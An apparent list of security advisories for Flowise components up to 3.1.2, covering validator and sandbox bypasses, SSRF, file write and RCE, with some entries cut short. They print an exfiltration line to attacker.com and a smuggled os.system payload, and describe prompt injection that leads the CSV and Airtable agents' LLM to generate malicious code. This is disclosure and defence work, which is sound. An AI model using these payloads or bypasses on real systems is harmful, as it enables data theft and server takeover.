    Flowise Prompt Injection to RCE and SSRF via CSV/Airtable Agent Python Validator Bypass

    CVE-2026-73487 · GHSA-w7x8-q2gp-5cgg

    Affected
    • npm flowise-components <= 3.1.2
    Fixed in
    3.1.3· Vendor fix available
    Issue
    Flowise <= 3.1.2 CSV Agent and Airtable Agent nodes use a regex-based blocklist (validatePythonCodeForDataFrame()) to sanitize LLM-generated Python code before execution in Pyodide. The validator has multiple structural bypasses that allow an attacker to exfiltrate all loaded data to an external server, perform SSRF against internal services, and potentially achieve further code execution -- all through prompt injection via the unauthenticated prediction API. The most impactful bypass is trivial: pd.readjson("http://attacker.com/?d=" + df.tojson()) passes every regex check yet makes an outbound HTTP request carrying the entire dataset. No special configuration is required. Severity Critical (CVSS 3.1: 9.3) -- AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N Affected Versions - Flowise <= 3.1.2 (latest at time of disclosure) - Any deployment with a CSV Agent or Airtable Agent chatflow Details Root Cause The validatePythonCodeForDataFrame() function…

    Flowise NodeVM sandbox escape via puppeteer allowlist - authenticated RCE and arbitrary file read via Chromium

    CVE-2026-73483 · GHSA-9gvv-qjj3-2p6g

    Affected
    • npm flowise-components < 3.1.3
    Fixed in
    3.1.3· Vendor fix available
    Issue
    Flowise (packages flowise and flowise-components) in versions <= 3.1.2 contain a sandbox escape in the `vm2/@flowiseai/nodevm` JavaScript sandbox. An authenticated user with access to the `/api/v1/node-custom-function` endpoint can escape the sandbox by supplying attacker-controlled executablePath and args parameters to puppeteer.launch(), which internally invokes child_process.spawn() outside the sandbox boundary. This allows execution of arbitrary OS commands as the Flowise process user (root in the official Docker image) and arbitrary host file disclosure via Chromium's `file://` URL handling. In versions 3.0.8–3.1.2 exploitation requires `ALLOW_BUILTIN_DEP=true`; earlier versions are exploitable by default. Fixed in 3.1.3.

    Affected
    • npm flowise-components <= 3.1.2

    Issue
    -- ABSTRACT ------------------------------------- Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products: Flowise - Flowise -- VULNERABILITY DETAILS ------------------------ Version tested: 3.1.1 Installer file: https://github.com/FlowiseAI/Flowise (npm install flowise@3.1.1) Platform tested: Ubuntu 25.10 --- A prompt injection sent to a chatflow using a CSV Agent node can cause the LLM to respond with a malicious Python script that bypasses the blocklist validator and executes in an unsandboxed pyodide environment. An attacker can leverage this to execute arbitrary code in the context of the user running the server. Analysis When a user makes a query against a chatflow using the CSV Agent node, the run method of the CSVAgents class is called. This method reads the CSV file, loads a pyodide environment, and uses pandas to extract column names and data types into a dictionary. It then constructs a system prompt using that dictionary and the…

    Flowise: RCE via CSVAgent csvFile data URI base64 segment is interpolated into Python source without validation

    CVE-2026-69264 · GHSA-4j8x-x6v7-w9rq

    Affected
    • npm flowise-components <= 3.1.2
    Fixed in
    3.1.3· Vendor fix available
    Issue
    Flowise's CSVAgent interpolates an attacker-controlled segment of the csvFile data URI directly into a Python source-code template that is then executed by Pyodide. Because Pyodide is loaded with the default js bridge to globalThis (which on Node.js exposes eval and dynamic import()), the attacker can break out of the Python string literal, hand a JS string to js.eval, dynamically import any Node built-in module (fs, childprocess, …), and execute arbitrary file I/O or OS commands as the Flowise process. The two validator paths around this code (validatePythonCodeForDataFrame and validateCustomReadCSVFunction) are never applied to the bootstrap template. A workspace user with chatflows:create (or any agentflows/chatflows update permission) plants a CSV Agent node with a crafted csvFile. Once the chatflow is exposed via the (whitelisted, public) POST /api/v1/prediction/:id endpoint, any unauthenticated request triggers the host RCE. Details Vulnerable file:…

    Flowise: Authenticated arbitrary file write in the S3 Directory document loader via unsanitized S3 object keys

    Affected
    • npm flowise-components <= 3.1.2
    Fixed in
    3.1.3· Vendor fix available
    Issue
    Flowise on current main allows an authenticated user with documentStores:preview-process permission to trigger the S3 Directory document loader with attacker-controlled S3 object keys. The loader joins each returned S3 key with a temporary directory using path.join(tempDir, key) and writes the object bytes to disk without validating traversal sequences such as ../. Cleanup later removes only the original temporary directory, so files written outside that directory persist on the host filesystem. This yields arbitrary file write with the privileges of the Flowise server process. A related variant exists in the S3File loader when fileProcessingMethod = unstructured (same root cause; its cleanup behavior turns it into a mixed arbitrary write/delete/DoS primitive). Affected component - packages/components/nodes/documentloaders/S3Directory/S3Directory.ts - line 191: filePath = path.join(tempDir, key) (unsanitized) - line 213: recursive mkdirSync creates parent path - line 216:…

    Affected
    • npm flowise-components <= 3.1.2
    Fixed in
    3.1.3· Vendor fix available
    Issue
    The validatePythonCodeForDataFrame blacklist in packages/components/src/pythonCodeValidator.ts can be bypassed with Unicode homoglyph identifiers, allowing arbitrary Python execution inside Pyodide and full OS command execution on the Flowise host via Pyodide's js module interop. This reopens the RCE paths patched as GHSA-3hjv-c53m-58jj (CSV Agent) and GHSA-v38x-c887-992f (Airtable Agent). Details packages/components/src/pythonCodeValidator.ts gates every call to pyodide.runPythonAsync in packages/components/nodes/agents/CSVAgent/CSVAgent.ts (lines 147, 198) and packages/components/nodes/agents/AirtableAgent/AirtableAgent.ts (line 186). The gate is a regex blacklist: Two design flaws combine into a bypass: 1. JavaScript regex \b is ASCII-only. Word boundaries are computed against the ASCII word class [A-Za-z0-9]. A Unicode letter such as U+1D41A (mathematical bold small a) is treated as a non-word character, so \bclass\b never matches cl𝐚ss. 2. Python 3 (PEP 3131)…

    Flowise: CVE-2025-8943 Patch Bypass: npm_config_yes bypasses MCP environment variable blocklist (Unauthenticated RCE)

    Affected
    • npm flowise-components <= 3.1.2
    Fixed in
    3.1.3· Vendor fix available
    Issue
    The mitigation shipped for CVE-2025-8943 blocks the -y and --yes flags on npx to stop auto-installation of arbitrary packages. That flag filter works. The environment-variable check in the same patch denies only four variable names by exact string match, and npm reads its configuration directly from npmconfig environment variables. Setting npmconfigyes=true reproduces the --yes behaviour the flag filter is meant to prevent, so npx auto-installs and executes the named package. The mitigation is fully bypassed. This works with the MCP security check enabled (CUSTOMMCPSECURITYCHECK=true). On a default Flowise deployment, which ships with no authentication, the result is unauthenticated remote code execution. Root cause The patch treats this as a flag-filtering problem, but the behaviour gated by --yes is also reachable through npm's environment-based configuration. The same is true for the other permitted interpreters, node and python3. A denylist of variable names cannot…

    The CSVAgent node was observed to allow users to write Python code which gets executed via pyodide. The original intent was to allow users to utilise the pandas library for CSV processing. Although there is a denylist that checks for dangerous Python constructs from being passed in, pandas has a readpickle() function that deserialises a pickled payload and this can be leveraged to achieve code execution. Details The affected file is the CSVAgent node, found in: flowise-components/nodes/agents/CSVAgent/CSVAgent.ts. At <1, the customReadCSVFunc is supplied by the user. This input goes through input validation that denies dangerous Python constructs from being passed in: However, by using pandas.readpickle(), an attacker can achieve code execution without hitting any of the denied words. The core security wrappers (secureAxiosRequest and secureFetch) intended to prevent Server-Side Request Forgery (SSRF) contain multiple logic flaws. These flaws allow attackers to bypass the allow/deny lists via DNS Rebinding (Time-of-Check Time-of-Use) or by exploiting the default configuration which fails to enforce any deny list. A Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTPDENYLIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) Details The vulnerability exists in the sandbox configuration within packages/components/src/utils.ts Vulnerable Code - Allowed Built-in Modules (Line 56): SSRF Protection Implementation (Lines 254-261): Root Cause: - The secureWrappers object only contains mocked versions of axios and node-fetch that enforce HTTPDENYLIST - The built-in http, https, and net modules are passed directly to the sandbox via builtinDeps without any SSRF protection - Users can import these modules directly and make arbitrary HTTP requests, which…

    Flowise is vulnerable to a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass using the FILE-STORAGE:: keyword combined with a NODEOPTIONS environment variable injection. This allows for the execution of arbitrary system commands with root privileges within the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance. Details The vulnerability is in a validation check within the replaceInputsWithConfig function within packages/server/src/utils/index.ts. The check for FILE-STORAGE:: was intended to handle file-type inputs but has three issues: 1. Uses .includes() instead of .startsWith(): The check passes if FILE-STORAGE:: appears ANYWHERE in the string, not just at the beginning. A remote user can embed it in a comment: / FILE-STORAGE:: / { custom config } 2. No parameter type validation: The check doesn't verify that the parameter is actually…

    The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide the following payload: DataFrame({'foo': ['bar!']});import os;os.system('whoami') that will get interpolated and executed by the server. Details The code in question that introduces the issue is in CSVAgent.ts. customReadCSVFunc is user-controlled and gets interpolated directly without sanitization into the code variable which gets executed by pyodide one line later in: dataframeColDict = await pyodide.runPythonAsync(code). An authenticated attacker can issue the following chain of requests: 1. Create a new chat flow by sending a POST request to /api/v1/chatflows. This will return the chatflowId in the response. 2. Send a POST request to /api/v1/prediction/[CHATFLOWID] to trigger the execution of the chatflow. NOTE: the chatflow can contain only this node in order for the exploit to work. 3. Optionally: send a DELETE request to /api/v1/chatflows to cleanup and…

    Summary “AirtableAgent” is an agent function provided by FlowiseAI that retrieves search results by accessing private datasets from airtable.com. “AirtableAgent” uses Python, along with Pyodide and Pandas, to get and return results. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. The point is that an attacker can bypass the intended behavior of the LLM and trigger Remote Code Execution through a simple prompt injection. About Airtable The airtable.ts function retrieves and processes user datasets stored on Airtable.com through its API. The usage of Airtable is as shown in the image above. After creating a Chatflow like above, you can ask data-related questions using prompts and receive answers. Details Airtable retrieves results by accessing datasets from airtable.com. When retrieving data, it is fetched as a JSON object encoded in base64. Then, when loading data, it…

    Flowise introduced SSRF protections through a centralized HTTP security wrapper (httpSecurity.ts) that implements deny-list validation and IP pinning logic. However, multiple tool implementations directly import and invoke raw HTTP clients (node-fetch, axiosInstead of using the secured wrapper. Because enforcement is neither mandatory nor centralized, these tools bypass SSRF mitigation entirely, restoring full SSRF capability even after the patch. This issue is distinct from specification trust issues and represents incomplete mitigation of previously addressed SSRF vulnerabilities. Details Intended Security Model: All outbound HTTP requests should pass through the centralized validation layer implemented in: This layer performs: - HTTPDENYLIST enforcement - IP resolution validation - IP pinning - Loopback blocking Observed Implementation Gap: Multiple tools bypass this layer and import HTTP libraries directly.
